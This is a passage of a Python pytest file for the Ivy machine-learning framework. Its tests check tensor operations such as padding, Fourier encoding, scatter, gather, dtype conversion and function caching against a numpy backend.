                           np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
    else:
        assert np.allclose(call(ivy.repeat, x, reps, axis),
                           np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
    "x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
    """Test ivy.zero_pad: type, padded shape, and values against the numpy backend."""
    # smoke test
    x, pw_raw = x_n_pw
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    # pad-widths may be passed either as a nested list or as an ivy array
    ret_from_list = ivy.zero_pad(x, pw_raw)
    pw = ivy.array(pw_raw, 'int32', dev)
    ret = ivy.zero_pad(x, pw)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: each dim grows by the pads on either side
    x_shape = [1] if x.shape == () else x.shape
    expected_shape = tuple(int(dim + before + after)
                           for dim, (before, after) in zip(x_shape, pw_raw))
    assert ret.shape == expected_shape
    # value test
    assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
@pytest.mark.parametrize(
    "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
                                         3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
                         ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
                          [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
                             -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
                             -1.0000000e+00],
                            [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
                             -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
                             1.0000000e+00]],
                           [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
                             -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
                             -1.0000000e+00],
                            [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
                             -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
                             1.0000000e+00]],
                           [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
                             -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
                             -1.0000000e+00],
                            [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
                             -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
                             1.0000000e+00]]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
    """Test ivy.fourier_encode: type, shape, and values against precomputed ground truth.

    max_freq may be a scalar or a per-feature list; the output appends
    1 + 2*num_bands encoding channels to the input's trailing dimension.
    """
    # smoke test
    x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    if isinstance(max_freq, list):
        # per-feature max frequencies are passed as an array
        max_freq = tensor_fn(max_freq, dtype, dev)
    ret = ivy.fourier_encode(x, max_freq, num_bands)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: trailing axis gains the raw value plus sin/cos bands
    x_shape = [1] if x.shape == () else list(x.shape)
    expected_shape = x_shape + [1 + 2*num_bands]
    assert list(ret.shape) == expected_shape
    # value test (loose atol: ground truth was captured as float32)
    assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
    "x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
    """Test ivy.constant_pad: type, padded shape, and values against the numpy backend."""
    # smoke test
    x, pw_raw, pad_value = x_n_pw_n_val
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    # pad-widths may be passed either as a nested list or as an ivy array
    ret_from_list = ivy.constant_pad(x, pw_raw, pad_value)
    pw = ivy.array(pw_raw, 'int32', dev)
    ret = ivy.constant_pad(x, pw, pad_value)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: each dim grows by the pads on either side
    x_shape = [1] if x.shape == () else x.shape
    expected_shape = tuple(int(dim + before + after)
                           for dim, (before, after) in zip(x_shape, pw_raw))
    assert ret.shape == expected_shape
    # value test
    assert np.allclose(call(ivy.constant_pad, x, pw, pad_value),
                       np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), pad_value)))
# swapaxes
@pytest.mark.parametrize(
    "x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
    """Test ivy.swapaxes: type, shape, and values against the numpy backend."""
    # smoke test
    x, axis_a, axis_b = x_n_ax0_n_ax1
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.swapaxes(x, axis_a, axis_b)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: the two axes trade places in the shape
    expected_shape = list(x.shape)
    expected_shape[axis_a], expected_shape[axis_b] = expected_shape[axis_b], expected_shape[axis_a]
    assert ret.shape == tuple(expected_shape)
    # value test
    assert np.allclose(call(ivy.swapaxes, x, axis_a, axis_b),
                       np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), axis_a, axis_b)))
# expand_dims
@pytest.mark.parametrize(
    "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
    """Test ivy.expand_dims: type, shape, and values against the numpy backend."""
    # smoke test
    x, axis = x_n_axis
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.expand_dims(x, axis)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test
    expected_shape = list(x.shape)
    # normalize the axis against the OUTPUT rank (ndim + 1) before inserting:
    # list.insert interprets a negative position relative to the old length,
    # which is off by one vs expand_dims semantics (e.g. axis=-1 on shape (2,)
    # must give (2, 1), but insert(-1, 1) would give (1, 2))
    expected_shape.insert(axis % (len(x.shape) + 1), 1)
    assert ret.shape == tuple(expected_shape)
    # value test
    assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# indices_where
@pytest.mark.parametrize(
    "x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
    """Test ivy.indices_where: type, shape, and values against the numpy backend."""
    # smoke test
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.indices_where(x)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: one row per hit, one column per input dimension
    assert len(ret.shape) == 2
    assert ret.shape[-1] == len(x.shape)
    # value test
    assert np.allclose(call(ivy.indices_where, x),
                       np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
    "x_n_res", [([True], [False]),
                ([[0., float('nan')], [float('nan'), 3.]],
                 [[False, True], [True, False]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
    """ivy.isnan must flag exactly the NaN entries, elementwise."""
    x, expected = x_n_res
    # smoke test
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.isnan(x)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: elementwise op preserves the input shape
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.isnan, x), expected)
# isinf
@pytest.mark.parametrize(
    "x_n_res", [([True], [False]),
                ([[0., float('inf')], [float('nan'), -float('inf')]],
                 [[False, True], [False, True]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
    """ivy.isinf must flag exactly the +/-inf entries (NaN is not inf), elementwise."""
    x, expected = x_n_res
    # smoke test
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.isinf(x)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: elementwise op preserves the input shape
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.isinf, x), expected)
# isfinite
@pytest.mark.parametrize(
    "x_n_res", [([True], [True]),
                ([[0., float('inf')], [float('nan'), 3.]],
                 [[True, False], [False, True]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
    """ivy.isfinite must flag entries that are neither NaN nor infinite, elementwise."""
    x, expected = x_n_res
    # smoke test
    if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    ret = ivy.isfinite(x)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: elementwise op preserves the input shape
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.isfinite, x), expected)
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# one_hot
@pytest.mark.parametrize(
    "ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
    """Test ivy.one_hot: type, shape, and values against the numpy backend."""
    # smoke test
    indices, depth = ind_n_depth
    if isinstance(indices, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    indices = ivy.array(indices, 'int32', dev)
    ret = ivy.one_hot(indices, depth, dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: a trailing axis of size `depth` is appended
    assert ret.shape == indices.shape + (depth,)
    # value test
    assert np.allclose(call(ivy.one_hot, indices, depth, dev),
                       np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(indices), depth)))
# cumsum
@pytest.mark.parametrize(
    "x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
    """Test ivy.cumsum: type, shape, and values against the numpy backend."""
    # smoke test
    x, axis = x_n_axis
    # NOTE(review): tensor_fn is parametrized but unused — x is always ivy.array here
    x = ivy.array(x, dtype, dev)
    ret = ivy.cumsum(x, axis)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: cumulative ops preserve the input shape
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.cumsum, x, axis),
                       np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
    "x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
    "exclusive", [True, False])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
    """Test ivy.cumprod (inclusive and exclusive): type, shape, and values vs numpy backend."""
    # smoke test
    x, axis = x_n_axis
    # NOTE(review): tensor_fn is parametrized but unused — x is always ivy.array here
    x = ivy.array(x, dtype, dev)
    ret = ivy.cumprod(x, axis, exclusive)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: cumulative ops preserve the input shape
    assert ret.shape == x.shape
    # value test
    assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
                       np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# scatter_flat
@pytest.mark.parametrize(
    "inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
                                        ([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
                                        ([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
    "red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
    """Test ivy.scatter_flat: scatter `upd` at flat indices `inds` into a fresh
    tensor of length `size` (or into the provided pre-existing `tensor`),
    applying reduction `red`, and compare against the numpy backend.
    """
    # smoke test
    if red in ('sum', 'min', 'max') and call is helpers.mx_call:
        # mxnet does not support sum, min or max reduction for scattering
        pytest.skip()
    inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
    if ivy.exists(tensor) and call is helpers.mx_call:
        # mxnet does not support scattering into pre-existing tensors
        pytest.skip()
    inds = ivy.array(inds, 'int32', dev)
    upd = tensor_fn(upd, dtype, dev)
    if tensor:
        # pytorch variables do not support in-place updates
        tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
            else tensor_fn(tensor, dtype, dev)
    ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: result length is `size`, or matches the target tensor
    if size:
        assert ret.shape == (size,)
    else:
        assert ret.shape == tensor.shape
    # value test
    if red == 'replace' and with_duplicates:
        # replace with duplicates give non-deterministic outputs
        return
    assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
                       np.asarray(ivy.functional.backends.numpy.scatter_flat(
                           ivy.to_numpy(inds), ivy.to_numpy(upd), size,
                           ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
    "inds_n_upd_n_shape_tnsr_n_wdup",
    [([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
     ([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
                   [[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
     ([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                               [[4, 5, 6], [7, 8, 9], [1, 2, 3]],
                               [[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
    "red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
    """Test ivy.scatter_nd: scatter `upd` at multi-dim indices `inds` into a fresh
    tensor of the given `shape` (or into the provided pre-existing `tensor`),
    applying reduction `red`, and compare against the numpy backend.
    """
    # smoke test
    if red in ('sum', 'min', 'max') and call is helpers.mx_call:
        # mxnet does not support sum, min or max reduction for scattering
        pytest.skip()
    inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
    if ivy.exists(tensor) and call is helpers.mx_call:
        # mxnet does not support scattering into pre-existing tensors
        pytest.skip()
    inds = ivy.array(inds, 'int32', dev)
    upd = tensor_fn(upd, dtype, dev)
    if tensor:
        # pytorch variables do not support in-place updates
        tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
            else tensor_fn(tensor, dtype, dev)
    ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: result shape is `shape`, or matches the target tensor
    if shape:
        assert tuple(ret.shape) == tuple(shape)
    else:
        assert tuple(ret.shape) == tuple(tensor.shape)
    # value test
    if red == 'replace' and with_duplicates:
        # replace with duplicates give non-deterministic outputs
        return
    ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
    true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
        ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
        ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
    assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
    "prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
                           ([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
    """Test ivy.gather: type, shape, and values against the numpy backend."""
    # smoke test
    params, indices, axis = prms_n_inds_n_axis
    params = tensor_fn(params, dtype, dev)
    indices = ivy.array(indices, 'int32', dev)
    ret = ivy.gather(params, indices, axis, dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: one gathered element per index
    assert ret.shape == indices.shape
    # value test
    assert np.allclose(call(ivy.gather, params, indices, axis, dev),
                       np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(params), ivy.to_numpy(indices), axis)))
# gather_nd
@pytest.mark.parametrize(
    "prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
                    ([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
                    ([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
    """Test ivy.gather_nd: type, shape, and values against the numpy backend."""
    # smoke test
    params, indices = prms_n_inds
    params = tensor_fn(params, dtype, dev)
    indices = ivy.array(indices, 'int32', dev)
    ret = ivy.gather_nd(params, indices, dev)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: indices' last axis selects into params' leading dims;
    # the remaining params dims are carried through
    assert ret.shape == indices.shape[:-1] + params.shape[indices.shape[-1]:]
    # value test
    assert np.allclose(call(ivy.gather_nd, params, indices, dev),
                       np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(params), ivy.to_numpy(indices))))
# linear_resample
@pytest.mark.parametrize(
    "x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
                                    ([[[10., 9.], [8., 7.]]], 5, -2,
                                     [[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
                                    ([[[10., 9.], [8., 7.]]], 5, -1,
                                     [[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
    """Test ivy.linear_resample against precomputed interpolation ground truth."""
    # smoke test
    x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
    x = tensor_fn(x, dtype, dev)
    ret = ivy.linear_resample(x, samples, axis)
    # type test
    assert ivy.is_native_array(ret)
    # cardinality test: only the resampled axis changes size, to `samples`
    x_shape = list(x.shape)
    axis = axis % len(x_shape)
    expected_shape = x_shape[:axis] + [samples] + x_shape[axis + 1:]
    assert list(ret.shape) == expected_shape
    # value test
    resampled = call(ivy.linear_resample, x, samples, axis)
    assert np.allclose(resampled, np.array(y_true))
# exists
@pytest.mark.parametrize(
    "x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
    """ivy.exists returns True for anything other than None."""
    # smoke test
    x = None if x is None else tensor_fn(x, dtype, dev)
    ret = ivy.exists(x)
    # type test
    assert isinstance(ret, bool)
    # value test
    assert ret == (x is not None)
# default
@pytest.mark.parametrize(
    "x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
    "dtype", ['float32'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
    """ivy.default returns x when it exists, otherwise the default value."""
    x, default_val = x_n_dv
    # smoke test
    x = None if x is None else tensor_fn(x, dtype, dev)
    default_val = tensor_fn(default_val, dtype, dev)
    ret = ivy.default(x, default_val)
    # type test
    assert ivy.is_native_array(ret)
    # value test
    expected = ivy.to_numpy(default_val if x is None else x)
    assert np.allclose(call(ivy.default, x, default_val), expected)
# dtype bits
@pytest.mark.parametrize(
    "x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
    "dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
    """ivy.dtype_bits returns the bit width of the array's dtype as an int."""
    # smoke test
    if ivy.invalid_dtype(dtype):
        pytest.skip()
    if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    bits = ivy.dtype_bits(ivy.dtype(x))
    # type test
    assert isinstance(bits, int)
    # value test: 1 covers bool, the rest are the standard widths
    assert bits in (1, 8, 16, 32, 64)
# dtype_to_str
@pytest.mark.parametrize(
    "x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
    "dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
    """ivy.dtype_to_str must agree with ivy.dtype(..., as_str=True)."""
    # smoke test
    if call is helpers.mx_call and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    if call is helpers.jnp_call and dtype in ['int64', 'float64']:
        # jax does not support int64 or float64 arrays
        pytest.skip()
    if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    via_dtype = ivy.dtype(x, as_str=True)
    via_convert = ivy.dtype_to_str(ivy.dtype(x))
    # type test
    assert isinstance(via_dtype, str)
    assert isinstance(via_convert, str)
    # value test
    assert via_convert == via_dtype
# dtype_from_str
@pytest.mark.parametrize(
    "x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
    "dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
    "tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
    """ivy.dtype_from_str must round-trip the string form back to the native dtype."""
    # smoke test
    if call is helpers.mx_call and dtype == 'int16':
        # mxnet does not support int16
        pytest.skip()
    if call is helpers.jnp_call and dtype in ['int64', 'float64']:
        # jax does not support int64 or float64 arrays
        pytest.skip()
    if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
        # mxnet does not support 0-dimensional variables
        pytest.skip()
    x = tensor_fn(x, dtype, dev)
    round_tripped = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
    native = ivy.dtype(x)
    # value test: the round trip must yield the very same dtype object (`is`, not `==`)
    assert round_tripped is native
def test_cache_fn(dev, call):
    """ivy.cache_fn must memoize zero-arg calls, and repeated wrappings of the
    same function must share a single global cache."""
    def func():
        return ivy.random_uniform()
    # querying one cached function twice returns the very same object,
    # while a direct call produces a fresh random value
    cached_fn = ivy.cache_fn(func)
    first = cached_fn()
    second = cached_fn()
    fresh = func()
    assert ivy.to_numpy(first).item() == ivy.to_numpy(second).item()
    assert ivy.to_numpy(first).item() != ivy.to_numpy(fresh).item()
    assert first is second
    assert first is not fresh
    # wrapping the same function repeatedly hits the same global cache dict
    first = ivy.cache_fn(func)()
    second = ivy.cache_fn(func)()
    fresh = func()
    assert ivy.to_numpy(first).item() == ivy.to_numpy(second).item()
